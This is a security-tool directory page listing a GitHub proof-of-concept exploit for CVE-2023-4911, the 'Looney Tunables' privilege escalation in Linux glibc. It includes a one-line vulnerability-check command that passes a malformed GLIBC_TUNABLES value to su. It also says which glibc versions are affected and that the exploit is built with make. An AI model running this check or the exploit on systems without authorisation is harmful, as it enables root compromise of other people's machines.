Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2023-4911 — CVE-2023-4911 | Kitploit
Tools/GitHubGitHub/ruycr4ft/cve-2023-4911
Privilege EscalationVulnerability AnalysisExploitationPenetration Testing
GitHubruycr4ft/cve-2023-4911

CVE-2023-4911

CVE-2023-4911

View RepositoryWebsite
1822 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2023-4911

This is a PoC (Proof Of Concept) for the Looney Tunables Linux Privilege Escalation vulnerability. This is based on this PoC. Great thanks to leesh3288. Here you can find a very detailed writeup, and here you can see a very cool video by IppSec.

Usage

Check if it's vulnerable

root@kitploit:~
env -i "GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=A" "Z=`printf '%08192x' 1`" /usr/bin/su --help

It is worth saying that vulnerable glibc versions are, including this one, from 2.35-0ubuntu3.3 and below.

Run the exploit

root@kitploit:~
$ make

Download Tool